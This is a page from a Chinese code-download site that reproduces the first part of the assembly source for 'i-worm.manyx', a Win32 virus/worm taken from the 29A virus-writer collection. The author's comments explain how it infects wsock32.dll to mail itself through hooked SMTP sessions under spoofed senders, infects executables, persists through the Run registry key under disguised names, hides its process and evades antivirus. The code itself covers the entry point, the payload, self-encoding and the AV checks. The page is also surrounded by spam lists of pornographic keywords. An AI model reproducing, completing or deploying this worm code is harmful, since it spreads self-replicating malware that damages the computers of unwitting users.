亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? 29a-7.008

?? 從29A上收集的病毒源碼
?? 008
?? 第 1 頁 / 共 5 頁
字號:

;
; i-worm.manyx
; Coded by Bumblebee
;
; DISCLAIMER -
;
; THIS IS THE SOURCE CODE OF A VIRUS/WORM.
;
; IN NO EVENT SHALL THE AUTHOR OF THIS PROGRAM BE LIABLE FOR ANY DIRECT,
; INDIRECT,  INCIDENTAL,  SPECIAL,  EXEMPLARY,  OR CONSEQUENTIAL DAMAGES
; ARISING   IN   ANY   WAY   OUT   OF   THE   USE   OF   THIS  SOFTWARE.
;
; USE  IT AT YOR OWN RISK,  OR DON'T USE IT.  BUT DON'T  FUCK THE CODER!
;
; Some comments:
;
; Think about it as a main body able to install some of its parts (those
; parts are not a complete virus, only the needed stuff to let the  main
; body keep on spreading). When one of those  parts  is  installed,  the
; rest can be removed from the system and the piece still work.
; The way each part work is very determined by the main body. That seems
; so logical for an infected file (the polymorphic  code  usually  never
; changes once the file is  infected), but  is  also  applied  to  wsock
; infection. That is what i call 'slow behavior'.
; However there is a little random part, but is not very important after
; all.
;
; There follows a brief for each part:
;
;  main body: infect wsock32.dll, install, payload and infect PE files
;  wsock32.dll: hook smtp sessions to send a copy of the main body
;  infected file: drop and exec main body
;
; Notice the infected files will exec main body EVER, no matter  if  it
; is installed yet. In that way  the  virus  act  as  a  direct  action
; infector, even infected sample won't infect other files. That's  due,
; once the main body is installed, it will infect all files in  current
; directory (work directory). That means when an  infected  notepad  is
; called by explorer for reading a txt file, it will try  to  drop  the
; main body and exec it. At this point the work directory of  the  main
; body will be notepad's one, so it will  infect  files  there  as  the
; classical direct action infector does.
;
; The only data fixed is the filename where the main body is  saved  in
; each drop. Some random data is based in the C HDD volume name and, in
; wsock case, in the stack of the app sending the  mail.  The  infected
; samples will come from random hotmail address. I know that's not fair
; but most smtp and esmtp servers today check the sender domain exists.
; I'm sure ISPs won't block all hotmail mails (sexyfun.net  is  blocked
; in several ones huehuehue).
;
; Why ios.sys? Simple: it exists in DOS 6.22 (i'm not sure  if  older).
; Due to this is a name you're used to, and you won't delete it.  Win9x
; have a io.sys file, but not ios (at least until you're not infected).
;
; Why the installation name is 8 random letter? Because Hybris and  may
; be other viruses use the same way. A confused user is  nice  when  he
; needs to find help.
;
; Why some strings are encrypted in main body and others not? mmm  I've
; encrypted only some that may show as suspicious. Anyway  it  is  only
; a protection before the file is installed,  and  no  matter  if  that
; ABFDGABC.exe has suspicious strings or not. If you got it, IT'S  VERY
; SUSPICIOUS. In the same way, if the user  peeps  into  wsock32.dll...
; The fact is tested av were not able to detect it in 1st place.
;
; Sometimes filenames found into personal folder (usually my documents)
; will be used to generate the mail to send. Sometimes not. The wsock32
; hook is intended to be full compatible and stable (in fact  it  works
; fine with both blocking and non-blocking sockets, no matter how  slow
; is the connection with the smtp server and what mta you use).
;
; I've coded it with win98 in mind, thus  it  is  the  most  widespread
; win32 compliant system. Indeed most parts will work  in  most  win32.
;
; It uses base64 and MIME 1.0, the payload is not destructive but clear
; enough (and annoying), and there are no comments in the source :)
;
; Have fun.
;
; - main.asm BOF -

%include "win32n.inc"

[extern ExitProcess]
[extern CreateFileMappingA]
[extern GetLastError]

[segment .text]
[global main]

main:
        call    stealthProc

        call    initAux
        jc      exitApp

        call    installMailHook

        call    install
        jnc     exitDeinitApp

        xor     eax,eax
        push    dword regName
        push    dword 1024
        push    eax
        push    dword 4
        push    eax
        dec     eax
        push    eax
        call    CreateFileMappingA
        or      eax,eax
        jz      exitDeinitApp

        push    eax
        call    GetLastError
        pop     ecx
        cmp     eax,0b7h
        je      exitDeinitApp

        push    ecx

        not     dword [fmask]
        call    scandirpe

        call    payload

        call    CloseHandle

exitDeinitApp:
        call    deInitAux

exitApp:
        push    dword 0
        call    ExitProcess

%include "auxf.inc"
%include "payload.inc"
%include "install.inc"
%include "infectpe.inc"
%include "poly.inc"
%include "findfiles.inc"
%include "process.inc"
%include "wsock.inc"

[segment .data]

seed            dd      87654321h
iname           db      '\'
fname           db      0,0,0,0,0,0,0,0
                dd      ~'.exe'
                db      0
regKey          db      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
regName         db      0,0,0,0,0
hkey            dd      0
drive           db      'c:\',0

encTable        db      'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv'
                db      'wxyz0123456789+/'

fmask           dd      ~"*.ex"
                db      'e',0
findHnd         dd      0

perPath         db      "SOFTWARE\Microsoft\Windows\CurrentVersion"
                db      "\Explorer\Shell Folders",0
perValue        db      "Personal",0
PersonalPs      dd      128
fmaskall        dd      ~"*.*"

kernel32dll     db      'KERNEL32.DLL',0
registerSrvProc db      'RegisterServiceProcess',0

wsock32dllp     db      '\'
wsock32dll      dd      ~'wsoc',~'k32.'
                db      'dll',0

wininitstr      dd      ~'[ren',~'ame]'
                db      0dh,0ah
wininitstrLen   equ     $-wininitstr
wininit         dd      ~'\win'
                db      'init.ini',0

dropCode:
%include "dropit.inc"

wsockCode:
%include "wsockhook.inc"

[segment .bss]

memory          resd    1
attachment      resd    1
vsize           resd    1
swidth          resd    1
sheight         resd    1
localtime       resd    4
fHnd            resd    1
mapMem          resd    1
fhmap           resd    1
fileTime0       resd    2
fileTime1       resd    2
fileTime2       resd    2
fileAttrib      resd    1
fileSize        resd    1
padding         resd    1
ccKey           resd    1

poly            resd    1
polySize        resd    1
crptBegin       resd    1
registers       resd    8
freer           resd    1
rIdx            resd    1
rCnt            resd    1
vKey            resd    1
mKey            resd    1
vIdx            resd    1
vCnt            resd    1
lCnt            resd    1
kStack          resd    MAXLAYER 
mStack          resd    MAXLAYER 
finddata:
        dwFileAttributes resd  1
        dwLowDateTime0  resd   1
        dwHigDateTime0  resd   1
        dwLowDateTime1  resd   1
        dwHigDateTime1  resd   1
        dwLowDateTime2  resd   1
        dwHigDateTime2  resd   1
        nFileSizeHigh   resd   1
        nFileSizeLow    resd   1
        dwReserved      resd   2
        cFileName       resb   260
        cAlternateFilename resb 16

PersonalP       resb 128

; - main.asm EOF -
; - payload.inc BOF -

[extern GetDesktopWindow]
[extern LoadIconA]
[extern GetWindowDC]
[extern DrawIcon]
[extern GetSystemMetrics]
[extern GetLocalTime]

payload:
        push    dword localtime
        call    GetLocalTime
        lea     esi,[localtime]
        test    word [esi+2],1
        jnz     doRet
        cmp     word [esi+6],5
        jne     doRet
        test    word [esi+8],8
        jz      doRet
        mov     al,0c3h
doRet   equ     $-1

        push    dword SM_CXFULLSCREEN
        call    GetSystemMetrics
        mov     [swidth],eax

        push    dword SM_CYFULLSCREEN
        call    GetSystemMetrics
        mov     [sheight],eax

        push    dword 32517 ; IDI_WINLOGO
        push    dword 0
        call    LoadIconA

        push    eax

        call    GetDesktopWindow

        push    eax
        call    GetWindowDC

        pop     esi
        mov     edi,eax

iconLoop:
        push    esi
        push    dword [sheight]
        call    rnd
        push    eax
        push    dword [swidth]
        call    rnd
        push    eax
        push    edi
        call    DrawIcon
        jmp     iconLoop

; - payload.inc EOF -

; - auxf.inc BOF -

[extern GetTickCount]
[extern GetModuleFileNameA]
[extern GlobalAlloc]
[extern GlobalFree]
[extern CreateFileA]
[extern GetFileSize]
[extern ReadFile]
[extern CloseHandle]

initAux:
        push    ebp
        mov     ebp,esp
        sub     esp,260
        push    ebp
        sub     ebp,260

        push    dword localtime
        call    GetLocalTime

        call    GetTickCount
        add     eax,dword [localtime+8]
        add     [seed],eax

        push    dword 260
        push    ebp
        push    dword 0
        call    GetModuleFileNameA
        or      eax,eax
        jz      near initAuxKO

        push    dword 0
        push    dword 80h
        push    dword 3
        push    dword 0
        push    dword 1
        push    dword 80000000h
        push    ebp
        call    CreateFileA
        inc     eax
        jz      near initAuxKO
        dec     eax

        push    eax
        push    dword 0
        push    eax
        call    GetFileSize
        pop     esi
        mov     edi,eax

        mov     dword [vsize],eax
        mov     dword [dropSize],eax

        add     eax,5
        push    eax
        add     eax,eax
        add     eax,eax
        add     eax,eax
        add     eax,eax
        push    eax
        push    dword GMEM_FIXED
        call    GlobalAlloc
        or      eax,eax
        jz      near initAuxKO

        mov     [memory],eax
        pop     ecx
        add     ecx,eax
        mov     [attachment],ecx

        push    dword 0h
        push    ebp
        push    edi
        push    eax
        push    esi
        call    ReadFile

        push    esi
        call    CloseHandle

        mov     eax,[vsize]
        xor     edx,edx
        mov     ecx,3
        div     ecx
        or      edx,edx
        jz      incredible
        inc     eax
incredible:
        mul     ecx
        mov     ecx,eax
        mov     eax,[memory]
        mov     edx,[attachment]
        call    encodeBase64
        mov     [attachmentSize],ecx

otherKeyPlz:
        push    dword 0ffh
        call    rnd
        or      al,al
        jz      otherKeyPlz
        mov     [ccKey],al
        mov     [cKey],al

        mov     esi,[memory]
        xor     eax,eax
        mov     al,[ccKey]
        mov     ecx,[dropSize]
encryptItLoop:
        not     byte [esi]
        xor     byte [esi],al
        inc     ax
        inc     esi
        loop    encryptItLoop

        call    genFileName

        mov     eax,(MAXPOLY*MAXLAYER)
        add     eax,dropperSize+5
        add     eax,[vsize]
        push    eax
        push    dword GMEM_FIXED
        call    GlobalAlloc
        or      eax,eax
        jz      initAuxKO

        mov     [poly],eax

        call    getPersonal

        clc
        mov     al,0f9h
initAuxKO       equ $-1
        pop     ebp
        leave
        ret

deInitAux:
        push    dword [poly]
        call    GlobalFree

        push    dword [memory]
        call    GlobalFree
        ret

genFileName:
        lea     edi,[fname]
        mov     ecx,8
        not     dword [edi+ecx]
fileName:
        push    ecx
        push    dword 10
        call    rnd
        pop     ecx
        add     eax,'A'
        stosb
        loop    fileName
        ret

rnd:
        mov     eax,[seed]
        imul    eax,9E3779B9h
        shr     eax,16
        add     [seed],eax
        xor     edx,edx
        mov     ecx,[esp+4]
        div     ecx
        mov     eax,edx
        retn    4

getPersonal:
        push    dword hkey
        push    dword 0
        push    dword 0
        push    dword perPath
        push    dword HKEY_CURRENT_USER
        call    RegOpenKeyExA
        or      eax,eax
        jnz     personalKO

        push    dword PersonalPs
        push    dword PersonalP
        push    eax
        push    eax
        push    dword perValue
        push    dword [hkey]
        call    RegQueryValueExA
        or      eax,eax
        jnz     personalKO

        push    dword [hkey]
        call    RegCloseKey

        mov     byte [pflag],1
outtaPersonal:
        ret
personalKO:
        mov     byte [pflag],0
        jmp     outtaPersonal

isAV:
        push    edi
UCaseLoop:
        cmp     byte [edi],'a'
        jb      notUCase
        cmp     byte [edi],'z'
        ja      notUCase
        sub     byte [edi],'a'-'A'
notUCase:
        inc     edi
        mov     al,[edi]
        or      al,al
        jnz     UCaseLoop
        pop     edi
avStrLoop:
        mov     ax,word [edi]
        not     ax
        cmp     ax,~'AV'
        je      itIsAV
        cmp     ax,~'DR'
        je      itIsAV
        cmp     ax,~'SP'
        je      itIsAV
        cmp     ax,~'F-'
        je      itIsAV
        cmp     ax,~'AN'
        je      itIsAV
        cmp     ax,~'VE'
        je      itIsAV
        cmp     ax,~'CL'
        je      itIsAV
        cmp     ax,~'ON'
        je      itIsAV
        not     ax
        inc     edi
        or      ah,ah
        jnz     avStrLoop

        clc
        mov     al,0f9h
itIsAV  equ $-1
        ret

encodeBase64:
        xor     esi,esi
        lea     edi,[encTable]
        push    ebp
        xor     ebp,ebp
baseLoop:

        xor     ebx,ebx
        mov     bl,byte [eax]
        shr     bl,2
        and     bl,00111111b
        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi

        mov     bx,word [eax]
        xchg    bl,bh
        shr     bx,4
        mov     bh,0
        and     bl,00111111b
        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi

        inc     eax
        mov     bx,word [eax]
        xchg    bl,bh
        shr     bx,6
        mov     bh,0
        and     bl,00111111b
        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi

        inc     eax
        xor     ebx,ebx
        mov     bl,byte [eax]
        and     bl,00111111b

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美中文字幕久久| 日韩亚洲欧美在线| 久久精品久久精品| 亚洲欧美日韩小说| 日韩欧美一区二区久久婷婷| 成人午夜电影久久影院| 丝袜美腿亚洲一区二区图片| 国产精品视频麻豆| 欧美一区二区视频观看视频| 99久久精品免费看国产| 国模少妇一区二区三区| 五月天激情综合| 亚洲视频小说图片| 国产欧美日韩不卡| 欧美mv日韩mv国产网站| 欧美午夜在线一二页| 成人a级免费电影| 激情欧美日韩一区二区| 日韩国产一二三区| 一区二区三区日本| 国产精品午夜久久| 久久精品视频一区| 2023国产精品| 日韩一级片在线观看| 欧美伊人久久大香线蕉综合69| 波多野结衣在线一区| 国产一区二区导航在线播放| 蜜臀av性久久久久蜜臀aⅴ| 亚洲午夜av在线| 最新国产の精品合集bt伙计| 欧美国产日韩亚洲一区| 国产午夜亚洲精品不卡| 精品国产一区二区亚洲人成毛片| 91麻豆精品国产自产在线 | 国产女人18毛片水真多成人如厕 | 欧美日韩情趣电影| 欧美中文字幕亚洲一区二区va在线| 波多野结衣中文字幕一区二区三区 | 成人免费毛片app| 国产酒店精品激情| 国产黑丝在线一区二区三区| 久久99久久精品| 国产综合久久久久影院| 狠狠色狠狠色综合日日91app| 麻豆精品在线播放| 日本美女一区二区| 九九九精品视频| 国产一区日韩二区欧美三区| 国产成人免费视频一区| 波多野结衣亚洲一区| 91影视在线播放| 欧美日韩在线不卡| 一区二区在线观看免费| 亚洲午夜久久久久久久久电影院 | 色狠狠桃花综合| 在线中文字幕不卡| 欧美日精品一区视频| 在线播放亚洲一区| 精品国产99国产精品| 国产欧美日韩三级| 玉足女爽爽91| 蜜桃久久久久久久| 国产成人精品免费网站| 色综合天天综合给合国产| 欧美天堂一区二区三区| 7777精品伊人久久久大香线蕉 | 亚洲同性同志一二三专区| 亚洲精品乱码久久久久久日本蜜臀| 亚洲一区二区三区四区在线| 日本最新不卡在线| 国产ts人妖一区二区| 91国产免费看| 欧美不卡激情三级在线观看| 国产色一区二区| 亚洲制服丝袜在线| 国产综合成人久久大片91| 91社区在线播放| 欧美成人福利视频| 中文字幕在线观看一区| 天天色图综合网| 高清国产一区二区| 欧美日韩国产高清一区二区| 久久欧美一区二区| 亚洲国产精品天堂| 国产69精品久久777的优势| 欧美图区在线视频| 国产亚洲一区二区在线观看| 亚洲欧美国产三级| 精品一区二区三区在线视频| 成人av网址在线观看| 777午夜精品视频在线播放| 国产精品丝袜在线| 六月丁香婷婷久久| 欧美在线色视频| 欧美高清在线视频| 免费成人av在线| 日本大香伊一区二区三区| 精品不卡在线视频| 亚洲gay无套男同| 波多野结衣一区二区三区| 精品欧美乱码久久久久久| 亚洲综合一区在线| 成人免费视频caoporn| 欧美一区二区三区电影| 亚洲精品视频在线观看免费| 国产精品一区专区| 正在播放一区二区| 亚洲午夜私人影院| 色久综合一二码| 中文字幕一区二区三区在线播放| 精品中文字幕一区二区| 777久久久精品| 亚洲va欧美va人人爽午夜| 色综合色综合色综合色综合色综合 | 国产精品少妇自拍| 久久 天天综合| 91精品国产日韩91久久久久久| 亚洲精品成人精品456| www.av精品| 国产精品毛片大码女人| 国产乱码精品一区二区三| 日韩精品最新网址| 免费成人深夜小野草| 欧美一区二区三区男人的天堂| 亚洲观看高清完整版在线观看 | 国产成人av电影在线播放| 欧美精品一区二区精品网| 男女激情视频一区| 欧美久久久久久蜜桃| 香蕉久久一区二区不卡无毒影院 | 亚洲免费观看在线观看| 不卡电影一区二区三区| 国产精品免费av| av色综合久久天堂av综合| 国产日产欧产精品推荐色| 国产精一区二区三区| 久久久99精品免费观看不卡| 国产主播一区二区| 国产午夜亚洲精品理论片色戒| 国产精品99久久久久久久vr| 久久久久高清精品| 处破女av一区二区| 国产精品日产欧美久久久久| 99久久精品一区| 亚洲一区二区三区不卡国产欧美| 欧美在线制服丝袜| 日韩福利电影在线观看| 精品日韩欧美一区二区| 精品在线视频一区| 久久蜜桃一区二区| caoporn国产一区二区| 一区二区三区日韩| 欧美一区二区三区系列电影| 久草精品在线观看| 久久九九全国免费| 色综合久久六月婷婷中文字幕| 亚洲伊人伊色伊影伊综合网| 7777女厕盗摄久久久| 欧美一区二区三区视频免费| 久久国产福利国产秒拍| 国产亚洲女人久久久久毛片| 91老师片黄在线观看| 亚洲第一会所有码转帖| 精品少妇一区二区三区在线视频| 国产成a人亚洲精品| 亚洲一区二区三区四区五区黄| 欧美一三区三区四区免费在线看| 国产一区二区视频在线| 成人欧美一区二区三区视频网页 | 91成人在线精品| 日本午夜一本久久久综合| 久久久国产综合精品女国产盗摄| 成人av免费在线播放| 香蕉久久一区二区不卡无毒影院 | 亚洲国产视频a| 精品国一区二区三区| 91亚洲午夜精品久久久久久| 日韩不卡一区二区| 国产精品大尺度| 7777精品伊人久久久大香线蕉完整版 | av电影在线观看不卡| 日韩精品欧美精品| 国产精品区一区二区三区| 欧美视频三区在线播放| 国产成人av电影在线播放| 亚洲福利一二三区| 国产精品日韩成人| 欧美成人a在线| 色综合久久天天综合网| 国产一区二区91| 天天影视网天天综合色在线播放| 国产精品免费视频网站| 日韩欧美黄色影院| 一本色道a无线码一区v| 国产美女精品一区二区三区| 偷拍日韩校园综合在线| 亚洲靠逼com| 国产欧美一区二区三区沐欲| 91精品国产福利| 欧美在线观看视频在线|